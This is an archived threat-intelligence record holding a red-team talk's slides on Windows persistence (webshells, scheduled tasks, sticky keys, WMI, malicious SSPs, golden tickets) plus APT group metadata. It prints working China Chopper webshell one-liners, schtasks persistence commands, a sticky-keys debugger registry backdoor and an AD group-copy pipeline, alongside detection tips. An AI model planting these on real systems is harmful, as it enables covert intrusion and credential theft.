{
	"id": "13700f2b-5205-454c-9a95-0291a84ff9ea",
	"created_at": "2026-04-06T00:06:42.55113Z",
	"updated_at": "2026-04-10T03:37:58.831743Z",
	"deleted_at": null,
	"sha1_hash": "fee5f92a7120e1930157254e3b24dba1c2ea320c",
	"title": "Ever Present Persistence - Established Footholds Seen in the Wild",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 103438,
	"plain_text": "Ever Present Persistence - Established Footholds Seen in the Wild\r\nArchived: 2026-04-05 13:44:26 UTC\r\n1.\r\n2.\r\nWhoami ● Evan Pena (@evan_pena2003) ○ Mandiant’s West Coast Red Team Functional Lead ○ Open Source Developer ■ ADEnumerator ■ NessusCombiner ■ NMapParser, etc.\r\n3.\r\n4.\r\nWhat’s this talk about? ● Persistence ● Persisting Networks vs. Hosts ○ The Old Ways ○ New School ● What else is needed? ○ Application ○ Privilege Levels ● Detection\r\n5.\r\n6.\r\nPersistence ● Main goal is continued access to a network, host, privilege level, or whatever. ● Persistence can overlap depending on your goal. E.g. persisting a host to persist a network.\r\n7.\r\n8.\r\nHost Based ● We’re looking to have ad-hoc, or programmatically defined, access to a system as close to on-demand as possible. ● All efforts in this phase are restricted to the individual system we are targeting.\r\n9.\r\nHost Based ● What do we need to be able to do? ○ Survive reboots – the most important aspect. ○ Complement network based persistence. ○ Foothold into sensitive systems.\r\n10.\r\nNetwork Based ● We’ve seen it used in two contexts: ○ Used to maintain access into a network ■ This is incredibly similar to host-based persistence, but could be considered network based for the intent it is used.\r\n11.\r\nNetwork Based ○ Used to maintain access to different network segments. ■ Don’t want to be VLANed off in a VOIP network.\r\n12.\r\nhttp://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild\r\nPage 1 of 10\r\nNetwork Based ● What do we want to do here? ○ Maintain persistence into unique networks. ○ Access likely facilitated through host-based persistence.\r\n13.\r\n14.\r\nWeb Shells ● Funny, this almost seems so trivial and easy that no one should be using it. ○ That is not the case ■ China Chopper - APT17, APT19, APT22 ■ ITSecShell, reDuh, ASPShell ■ Really, even just commodity code\r\n15.\r\nChina Chopper ● Very tiny webshell, about 4 kb stored server-side. ● Can be in a variety of languages (cfm, asp, php, etc.) ● Uses a client application to interact with the webshell\r\n16.\r\nChina Chopper Server Code ● ASPX ○ \u003c%@ Page Language=\"Jscript\"%\u003e\u003c%eval(Request.Item[\"password\"],\"unsafe\");%\u003e ● PHP ○ \u003c?php @eval($_POST['password']);?\u003e https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\n17.\r\n18.\r\nChina Chopper ● Pretty awesome features in it ○ File Explorer - including uploading and downloading of files, modification of timestamps ○ Database Client - mssql, mysql ○ Command Shell - normal ownage\r\n19.\r\nWeb Shell Prevention/Detection ● Hunt for known bad files ○ Hashes, other file/text-based indicators ● Blacklist all filetypes except expected files for upload functionality ● Don’t allow your web server to execute files uploaded from untrusted sources\r\n20.\r\nMagic Packet ● Or, how to access port 12345 with a packet to port 443 ● Attacker’s problem: ○ Compromised a web server (ports 80 and 443 are occupied)\r\n21.\r\nMagic Packet ○ Firewalls prevent connections to any other port ○ Wants a TCP backdoor to be remotely accessible ■ Can’t be bothered to write a web shell\r\n22.\r\nMagic Packet - Creative Solution ● Run backdoor, listening on 12345 ● Run malware “low” in the network stack that will: ○ Check incoming TCP SYN packets ○ When a SYN packet contains a specific signature, change the destination port from 443 to 12345\r\n23.\r\nMagic Packet - Creative Solution ○ Windows network stack will deliver the packet to backdoor ○ Malware alters the port in all subsequent packets for that TCP stream\r\n24.\r\nMagic Packet - Creative Solution (diagram): SYN dport 443 data=s3cr37 -> malware rewrites to SYN dport 12345 -> backdoor on 12345; SYN/ACK sport 12345 -> malware rewrites to SYN/ACK sport 443 (Compromised System)\r\n25.\r\nOutlook ● Outlook rules can help provide a really unique way to gain access to a system. ● Silent Break wrote a post on leveraging Outlook rules to gain access to a user’s system. ○ Focused on access, but can be used for persistence too :) https://silentbreaksecurity.com/malicious-outlook-rules/\r\n26.\r\nOutlook ● Create a modified Outlook rule to execute a binary when the trigger subject is received. ● Sync the rule against target user account. ● Send e-mail that triggers the rule. ● Get shell :)\r\n27.\r\n28.\r\nOutlook ● Additional tweaks ○ Have it auto-delete the e-mail when it arrives to prevent detection by the user/victim ● https://silentbreaksecurity.com/malicious-outlook-rules/\r\n29.\r\nOutlook ● Detection: ○ Casey Smith – link for searching server-side rules ○ https://blogs.msdn.microsoft.com/canberrapfe/2012/11/05/ever-needed-to-find-server-side-outlook-rules-that-forward-mail-outside-of-your-organisation/ ○ Main IOC is a rule set to execute a binary when a certain event happens.\r\n30.\r\n31.\r\n32.\r\nRegistry Hacks ● Probably the 101 method of host based persistence. ● Really easy to set up, and can be configured from varying levels of permissions. ● Can be used to complement new ways.\r\n33.\r\nRegistry Hacks ● You can configure it to run when the machine starts, or when a user logs into the machine. ○ HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ○ HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ● These methods are also highly publicized and are the first thing most defensive tools look for.\r\n34.\r\nRegistry Hacks ● Can be good for helping to solidify initial access, but I wouldn’t use them for long term persistence. ○ Hopefully most teams should have the ability to detect these, and therefore they shouldn’t be relied on.\r\n35.\r\nStartup Folder ● Startup folder will execute all files in the folder. ○ C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\r\n36.\r\nScheduled Tasks ● Scheduled tasks are a fairly easy way for a user of any level to persist a system. ● If you have the proper permissions, you can schedule up to SYSTEM level tasks. ● This is Microsoft’s recommended alternative to stop using AT.\r\n37.\r\nScheduled Tasks ● Scheduled tasks can be created from the command line with schtasks.exe or GUI. ● These can run on system startup, when a user logs into the system, after the system has been idle, etc. ● This can run binaries, powershell one liners, or others.\r\n39.\r\nScheduled Tasks ● schtasks /create /tn SysUpdate /sc onidle /i 15 /tr c:\\users\\chris\\downloads\\safe.exe ● schtasks /create /tn WinUpdate /sc onstart /ru System /tr c:\\totallylegit.exe /s winsqldbsystem http://blog.cobaltstrike.com/2013/11/09/schtasks-persistence-with-powershell-one-liners/\r\n40.\r\nScheduled Tasks Detection ● Get a baseline of the different tasks set to run on a system ○ schtasks /query ○ Look in the Task Scheduler ○ Scheduled task log analysis ● Periodically audit systems to identify deviations\r\n41.\r\nService Manipulation ● Services typically run with SYSTEM level permissions, so they are a great candidate to target. ● Easiest way to install service based persistence (if not admin) is to check for write permissions to existing services.\r\n42.\r\n43.\r\nService Manipulation ● :) Now that targets have been found, you need a malicious service binary. ○ Veil-Evasion, PowerUp, custom code, etc. ● Save off the original service, and then replace it with your malicious binary. ● Bounce the box (if required).\r\n44.\r\nSticky Keys ● With administrative access to a machine, you can easily set up sticky keys. ○ Make a copy of sethc.exe ○ Copy cmd.exe to C:\\windows\\system32\\sethc.exe ○ Reboot, and hit shift 5 times!\r\n46.\r\nSticky Keys ● Another method, setting cmd.exe as the Debugger for sethc.exe. ○ REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html?showComment=1335891005473#c7632690272609583721\r\n47.\r\nSticky Keys ● Main problem is it doesn’t require authentication. ○ If using a shell ● So if this is used, ensure that you use a callback that only connects to you, etc.\r\n48.\r\nSticky Keys ● Detection: ○ Compare the sethc.exe binary hash with the known good sethc.exe ○ Ensure sethc.exe doesn’t have a debugger set up that triggers a different binary.\r\n49.\r\n50.\r\nDLL Search Order Hijack ● Search order hijacking exploits how Windows searches for DLLs when loading an executable. ○ Specifically, it exploits the fact that Windows will search the same folder the binary is stored in for a DLL first*\r\n51.\r\nDLL Search Order Hijack ● Old sample in CAPEC ○ If you drop ntshrui.dll within C:\\Windows and run explorer.exe, you can get the DLL within C:\\Windows to be executed ● This exploits the order in which the DLL is searched for on a Windows system\r\n52.\r\nDLL Search Order Hijack ● Attackers create malicious DLLs that exploit this search order to get their DLL to run on a system. ● Since it’s every time the application runs, it can be used as a persistence technique. ● PowerUp can be used to find these opportunities\r\n53.\r\nDLL Search Order Hijack ● Used by the following actors ○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26 ● Used by the following malware ○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER\r\n54.\r\nLegit Scheduled Tasks ● Easy to identify scheduled tasks named “evilTask” or anomalous tasks ● First we must look at how investigators detect malicious scheduled tasks:\r\n55.\r\nLegit Scheduled Tasks ○ Stacking tasks across multiple systems to determine anomalous tasks ○ Parse task scheduler log (SchedLgU.txt)\r\n56.\r\nLegit Scheduled Tasks ● What if we modify existing legit scheduled tasks? ○ Specifically tasks that are not required for Windows functionality\r\n57.\r\nUnquoted Service Path ● Unquoted service paths exploit a vulnerability in the order that Windows searches for a binary when a space is in an unquoted path. ○ C:\\Program Files(x86)\\Steam\\Steam Gaming\\steam.exe\r\n58.\r\nUnquoted Service Path ● C:\\Program Files(x86)\\Steam\\Steam Gaming\\steam.exe ○ C:\\Program.exe ○ C:\\Program Files(x86)\\Steam\\Steam.exe ○ C:\\Program Files(x86)\\Steam\\Steam Gaming\\steam.exe ● We have three opportunities here!\r\n59.\r\nUnquoted Service Path ● If we have write access to any of the paths that Windows looks in, we can hijack the service. ○ Just need a service binary again :) ● Drop it into any of the paths on the previous slide, and restart the service! ○ Might have to wait for a restart\r\n60.\r\nUnquoted Service Path ● Prevention ○ Check service binaries on your images and determine if any are using unquoted service paths. ○ Make sure the paths aren’t writable by non-admins. ○ PowerUp can find these as well\r\n61.\r\nWMI ● Three requirements necessary to invoke a permanent WMI event subscriber: 1. An Event Filter 2. An Event Consumer 3. A Filter/Consumer Binding Original research performed by Matt Graeber released in “Practical Persistence with PowerShell” presentation\r\n62.\r\nEvent Filters ● The WMI query that fires upon an event occurring - usually, an event class derived from __InstanceModificationEvent, __InstanceCreationEvent, or __InstanceDeletionEvent Original research performed by Matt Graeber released in “Practical Persistence with PowerShell” presentation\r\n63.\r\nEvent Consumers ● There are five different types of Event consumers ● We’re specifically interested in the “CommandLineEventConsumer” Original research performed by Matt Graeber released in “Practical Persistence with PowerShell” presentation\r\n64.\r\nFilter/Consumer Binding ● This associates the event filter with the event consumer Original research performed by Matt Graeber released in “Practical Persistence with PowerShell” presentation\r\n65.\r\nWMI ● PowerSploit’s Persistence Module for WMI ○ Automates the process ○ Will create a permanent WMI event subscription ● Can use Out-EncodedCommand (in PowerSploit) to get one liner\r\n66.\r\nPowerShell Profiles ● Use standard persistence mechanism to execute PowerShell silently ○ \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NonInteractive -WindowStyle Hidden ○ It’s a legit exe!\r\n67.\r\n68.\r\nPowerShell Profiles ● Anytime PowerShell executes, it will execute code in the default profile. ● Create profile here ○ C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1\r\n69.\r\nSecurity Support Provider ● A security support provider (SSP) - like a security package ○ A user-mode security extension used to perform authentication during a client/server exchange. Original research performed by Matt Graeber released at MIRcon 2014\r\n70.\r\nSecurity Support Provider ● An authentication package (AP) ○ Used to extend interactive login authentication ○ Example: Enable RSA token authentication Original research performed by Matt Graeber released at MIRcon 2014\r\n71.\r\nSecurity Support Provider ● SSP/AP ○ Can serve tasks of SSPs and APs; loaded into lsass at boot. ○ Example: Kerberos and msv1_0 (NTLM) Original research performed by Matt Graeber released at MIRcon 2014\r\n72.\r\nSecurity Support Provider ● You can install your own SSP that will be loaded into lsass.exe. ○ No need for injection ● Can develop your own SSP DLL ○ Required export: SpLsaModeInitialize Original research performed by Matt Graeber released at MIRcon 2014\r\n73.\r\nSecurity Support Provider ● Use Persistence.psm1 PowerSploit module to install your malicious SSP ● Benjamin Delpy (@gentilkiwi) added SSP functionality to mimilib.dll. ○ Once installed and loaded into lsass.exe, it captures plaintext passwords. ○ This is achieved with the SpAcceptCredentials callback function. Original research performed by Matt Graeber released at MIRcon 2014\r\n74.\r\nMalicious SSP PoC - mimilib (image taken from “Analysis of Malicious SSP” - MIRcon 2014)\r\n75.\r\n76.\r\nBootkit ● A “bootkit” is a program that can alter the Master Boot Record (MBR) or Virtual Boot Record (VBR) so that malicious code is executed before the operating system is loaded. ● Moves the original MBR to a different location and places itself at the beginning of the drive.\r\n77.\r\nBootkit ○ Upon boot, a bootkit will modify a service to point to a modified DLL on disk. ○ Service DLL is responsible for executing backdoor payload.\r\n78.\r\n79.\r\nBut How Does It Work? ● Malicious MBR: Windows BIOS loads the modified MBR, which then loads the code in stage 2. ● Initial Loader: Loads the stage 3 code that was previously stored as a file on disk and in unallocated space.\r\n80.\r\nBut How Does It Work? ● Secondary Loader: Loads code that enables the installation and configuration of backdoor. The service hijacking phase. ● Backdoor Loader: Loads the backdoor from disk. Also restores the hijacked service back to its original form.\r\n81.\r\nBut How Does It Work? Simplified MBR bootkit execution taken from M-Trends 2016\r\n82.\r\nExcel Magic ● Malicious macro executes backdoor ● Ways you can ensure persistence? ○ Most people will execute Excel at least once a day ○ So why not leverage this as a persistence technique?\r\n83.\r\nExcel Magic ○ You can use “old way” persistence techniques to execute Excel at startup - that is a legit program! ○ Disable macro security settings so workbook executes without prompt\r\n85.\r\nExcel Magic ● Registry modification that executes specific Excel workbook upon Excel start ○ HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\Trusted Locations ○ Add location\r\n87.\r\n89.\r\nGolden Ticket ● This method came out due to Benjamin Delpy working with Sean Metcalf. ● This forges a golden ticket which can be good for 10 years! ● Golden tickets can provide on-demand domain privilege “upgrades” for any group within a domain.\r\n90.\r\nGolden Ticket ● You only need four pieces of information: ○ Domain SID ○ The name of the domain ○ User you want to create the hash for ○ krbtgt account hash ● You can build it offline, right at home\r\n91.\r\n92.\r\n93.\r\n94.\r\nGolden Ticket ● Key takeaways: ○ If impersonating a real user, even if the password is changed, this still works ○ Valid for as long as you specify (10 year default) ○ Only way to stop it is to change the krbtgt hash… twice… or rebuild from bare metal :)\r\n95.\r\nAccount Checkout? ● Case Study: ○ Client has account checkout system for domain administrator (DA) accounts. ○ Only two users have access to that system ○ System requires 2FA. ○ You can lose DA access if the user changes his password, PIN, or token. ○ User can see what accounts he checked out (could get caught!)\r\n96.\r\nAccount Checkout? ● We need to persist domain administrator without getting caught. ○ If we keep checking out accounts with the user we have, he might see that he has accounts checked out that he didn’t check out.\r\n97.\r\n98.\r\nAccount Checkout? ● PasswordVault permissions were managed through Active Directory groups... TONS of them. ○ Copy group memberships to a compromised user who doesn’t use PasswordVault ■ Note: All changes were well documented to revert\r\n99.\r\nAccount Checkout? Get-ADUser -Identity \u003cSOURCE USERNAME\u003e -Properties memberof | Select-Object -ExpandProperty memberof | Add-ADGroupMember -Members \u003cDESTINATION USERNAME\u003e\r\n100.\r\nConclusion ● Malware persistence will remain rampant. There will always be new and creative ways of maintaining persistence. ● Understanding malware persistence techniques is critical, as it serves as a focal point for incident response investigations and helps drive successful remediation.\r\nSource: http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY"
	],
	"references": [
		"http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild"
	],
	"report_names": [
		"ever-present-persistence-established-footholds-seen-in-the-wild"
	],
	"threat_actors": [
		{
			"id": "1f3cf3d1-4764-4158-a216-dd6352e671bb",
			"created_at": "2022-10-25T15:50:23.837615Z",
			"updated_at": "2026-04-10T02:00:05.322197Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"APT19",
				"Codoso",
				"C0d0so0",
				"Codoso Team",
				"Sunshop Group"
			],
			"source_name": "MITRE:APT19",
			"tools": [
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2150d1ac-edf0-46d4-a78a-a8899e45b2b5",
			"created_at": "2022-10-25T15:50:23.269339Z",
			"updated_at": "2026-04-10T02:00:05.402835Z",
			"deleted_at": null,
			"main_name": "APT17",
			"aliases": [
				"APT17",
				"Deputy Dog"
			],
			"source_name": "MITRE:APT17",
			"tools": [
				"BLACKCOFFEE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3fad11c6-4336-4b28-a606-f510eca5452e",
			"created_at": "2022-10-25T16:07:24.346573Z",
			"updated_at": "2026-04-10T02:00:04.948823Z",
			"deleted_at": null,
			"main_name": "Turbine Panda",
			"aliases": [
				"APT 26",
				"Black Vine",
				"Bronze Express",
				"Group 13",
				"JerseyMikes",
				"KungFu Kittens",
				"PinkPanther",
				"Shell Crew",
				"Taffeta Typhoon",
				"Turbine Panda",
				"WebMasters"
			],
			"source_name": "ETDA:Turbine Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Hurix",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mivast",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sakula",
				"Sakula RAT",
				"Sakurel",
				"Sogu",
				"StreamEx",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon",
				"ffrat"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "dd583696-3de6-4c23-bfb6-e675a38a7000",
			"created_at": "2022-10-25T16:07:23.338398Z",
			"updated_at": "2026-04-10T02:00:04.548798Z",
			"deleted_at": null,
			"main_name": "APT 20",
			"aliases": [
				"APT 20",
				"APT 8",
				"Crawling Taurus",
				"Operation Wocao",
				"TH3Bug",
				"Violin Panda"
			],
			"source_name": "ETDA:APT 20",
			"tools": [
				"Agent.dhwf",
				"Chymine",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Filesnfer",
				"Gen:Trojan.Heur.PT",
				"Kaba",
				"KeeThief",
				"Kerberoast",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"PlugX",
				"Poison Ivy",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SMBExec",
				"SPIVY",
				"SharpHound",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"WinRAR",
				"XServer",
				"Xamtrav",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7b039cc0-33b6-495a-b4ca-649d096b993d",
			"created_at": "2023-01-06T13:46:38.482654Z",
			"updated_at": "2026-04-10T02:00:02.99265Z",
			"deleted_at": null,
			"main_name": "APT22",
			"aliases": [
				"G0039",
				"Suckfly",
				"BRONZE OLIVE",
				"Group 46"
			],
			"source_name": "MISPGALAXY:APT22",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f",
			"created_at": "2022-10-25T16:07:23.335869Z",
			"updated_at": "2026-04-10T02:00:04.547702Z",
			"deleted_at": null,
			"main_name": "APT 19",
			"aliases": [
				"APT 19",
				"Bronze Firestone",
				"C0d0so0",
				"Checkered Typhoon",
				"Codoso",
				"Deep Panda",
				"G0009",
				"G0073",
				"Operation Kingslayer",
				"Red Pegasus",
				"Sunshop Group",
				"TG-3551"
			],
			"source_name": "ETDA:APT 19",
			"tools": [
				"Agentemis",
				"C0d0so0",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"EmPyre",
				"EmpireProject",
				"Fire Chili",
				"PowerShell Empire",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a7aefdda-98f1-4790-a32d-14cc99de2d60",
			"created_at": "2023-01-06T13:46:38.281844Z",
			"updated_at": "2026-04-10T02:00:02.909711Z",
			"deleted_at": null,
			"main_name": "APT17",
			"aliases": [
				"BRONZE KEYSTONE",
				"G0025",
				"Group 72",
				"G0001",
				"HELIUM",
				"Heart Typhoon",
				"Group 8",
				"AURORA PANDA",
				"Hidden Lynx",
				"Tailgater Team"
			],
			"source_name": "MISPGALAXY:APT17",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "46a151bd-e4c2-46f9-aee9-ee6942b01098",
			"created_at": "2023-01-06T13:46:38.288168Z",
			"updated_at": "2026-04-10T02:00:02.911919Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"DEEP PANDA",
				"Codoso",
				"KungFu Kittens",
				"Group 13",
				"G0009",
				"G0073",
				"Checkered Typhoon",
				"Black Vine",
				"TEMP.Avengers",
				"PinkPanther",
				"Shell Crew",
				"BRONZE FIRESTONE",
				"Sunshop Group"
			],
			"source_name": "MISPGALAXY:APT19",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "273a41a8-5115-4f55-865f-0960a765f18c",
			"created_at": "2022-10-25T16:07:24.397947Z",
			"updated_at": "2026-04-10T02:00:04.974605Z",
			"deleted_at": null,
			"main_name": "Wicked Spider",
			"aliases": [
				"APT 22",
				"Bronze Export",
				"Bronze Olive",
				"Wicked Spider"
			],
			"source_name": "ETDA:Wicked Spider",
			"tools": [
				"Agent.dhwf",
				"AngryRebel",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EternalBlue",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Kaba",
				"Korplug",
				"Moudour",
				"Mydoor",
				"PCRat",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ee39ecf0-d311-49e5-b0ae-3e3d71f71def",
			"created_at": "2025-08-07T02:03:24.626625Z",
			"updated_at": "2026-04-10T02:00:03.605175Z",
			"deleted_at": null,
			"main_name": "BRONZE KEYSTONE",
			"aliases": [
				"APT17 ",
				"Aurora Panda ",
				"DeputyDog ",
				"Group 72 ",
				"Hidden Lynx ",
				"TG-8153 ",
				"Tailgater Team"
			],
			"source_name": "Secureworks:BRONZE KEYSTONE",
			"tools": [
				"9002",
				"BlackCoffee",
				"DeputyDog",
				"Derusbi",
				"Gh0stHTTPSDropper",
				"HiKit",
				"InternalCMD",
				"PlugX",
				"PoisonIvy",
				"ZxShell"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1d63fba2-f042-41ca-8a72-64c6e737d295",
			"created_at": "2025-08-07T02:03:24.643647Z",
			"updated_at": "2026-04-10T02:00:03.719558Z",
			"deleted_at": null,
			"main_name": "BRONZE OLIVE",
			"aliases": [
				"APT22 ",
				"Barista",
				"Group 46 ",
				"Suckfly "
			],
			"source_name": "Secureworks:BRONZE OLIVE",
			"tools": [
				"Angryrebel",
				"DestroyRAT",
				"PlugX"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f2ce5b52-a220-4b94-ab66-4b81f3fed05d",
			"created_at": "2025-08-07T02:03:24.595597Z",
			"updated_at": "2026-04-10T02:00:03.740023Z",
			"deleted_at": null,
			"main_name": "BRONZE FIRESTONE",
			"aliases": [
				"APT19 ",
				"C0d0s0",
				"Checkered Typhoon ",
				"Chlorine ",
				"Deep Panda ",
				"Pupa ",
				"TG-3551 "
			],
			"source_name": "Secureworks:BRONZE FIRESTONE",
			"tools": [
				"9002",
				"Alice's Rabbit Hole",
				"Cobalt Strike",
				"Derusbi",
				"PlugX",
				"PoisonIvy",
				"PowerShell Empire",
				"Trojan Briba",
				"Zuguo"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "86fd71d3-06dc-4b73-b038-cedea7b83bac",
			"created_at": "2022-10-25T16:07:23.330793Z",
			"updated_at": "2026-04-10T02:00:04.545236Z",
			"deleted_at": null,
			"main_name": "APT 17",
			"aliases": [
				"APT 17",
				"ATK 2",
				"Beijing Group",
				"Bronze Keystone",
				"Deputy Dog",
				"Elderwood",
				"Elderwood Gang",
				"G0025",
				"G0066",
				"Operation Aurora",
				"Operation DeputyDog",
				"Operation Ephemeral Hydra",
				"Operation RAT Cook",
				"SIG22",
				"Sneaky Panda",
				"TEMP.Avengers",
				"TG-8153",
				"Tailgater Team"
			],
			"source_name": "ETDA:APT 17",
			"tools": [
				"9002 RAT",
				"AGENT.ABQMR",
				"AGENT.AQUP.DROPPER",
				"AGENT.BMZA",
				"AGENT.GUNZ",
				"Agent.dhwf",
				"AngryRebel",
				"BlackCoffee",
				"Briba",
				"Chymine",
				"Comfoo",
				"Comfoo RAT",
				"Darkmoon",
				"DeputyDog",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Fexel",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Gresim",
				"HOMEUNIX",
				"HiKit",
				"HidraQ",
				"Homux",
				"Hydraq",
				"Jumpall",
				"Kaba",
				"Korplug",
				"Linfo",
				"MCRAT.A",
				"McRAT",
				"MdmBot",
				"Mdmbot.E",
				"Moudour",
				"Mydoor",
				"Naid",
				"Nerex",
				"PCRat",
				"PNGRAT",
				"Pasam",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trojan.Naid",
				"Vasport",
				"Wiarp",
				"Xamtrav",
				"Zox",
				"ZoxPNG",
				"ZoxRPC",
				"gresim",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434002,
	"ts_updated_at": 1775792278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fee5f92a7120e1930157254e3b24dba1c2ea320c.pdf",
		"text": "https://archive.orkl.eu/fee5f92a7120e1930157254e3b24dba1c2ea320c.txt",
		"img": "https://archive.orkl.eu/fee5f92a7120e1930157254e3b24dba1c2ea320c.jpg"
	}
}